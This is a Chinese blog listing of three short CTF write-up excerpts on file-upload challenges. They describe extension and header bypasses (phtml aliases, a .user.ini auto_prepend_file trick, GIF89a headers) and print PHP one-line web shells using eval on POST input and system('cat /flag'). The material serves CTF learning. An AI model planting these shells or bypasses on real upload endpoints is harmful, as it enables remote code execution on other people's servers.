文件上传
「已注销」
这个作者很懒,什么都没留下…
展开
-
[ACTF2020 新生赛]Upload
知识点php别名绕过随意上传一个aa.jpg文件,抓包,修改后缀名,写马后缀名一直尝试到phtml后上传成功使用蚁剑连接双击进入后台在根目录下找到flag原创 2020-05-11 18:24:04 · 3067 阅读 · 1 评论 -
[SUCTF 2019]CheckIn
知识点文件上传.user.ini利用.user.ini进行文件上传,参考自从SUCTF 2019 CheckIn 浅谈.user.ini的利用上传这样的一个ini文件GIF89aauto_prepend_file=a.jpg再上传一个a.jpg文件GIF89a<script language='php'>system('cat /flag');</script>访问uploads/2c67ca1eaeadbdc1868d67003072b481/inde原创 2020-05-11 18:22:52 · 1256 阅读 · 0 评论 -
[极客大挑战 2019]Upload
知识点js绕过GIF89a文件头编写一句话木马上传<?php @eval($_POST[cmd]);?>发现php被过滤使用js脚本绕过<script language = 'php'>@eval($_POST[cmd]);</script>发现需要图片使用文件头绕过更改后缀名,多次尝试,发现phtml未被过滤php别名php3,php4,php5,pht,phtml,phps上传成功菜刀连接upload/c2.phtml,原创 2020-05-11 18:21:04 · 662 阅读 · 1 评论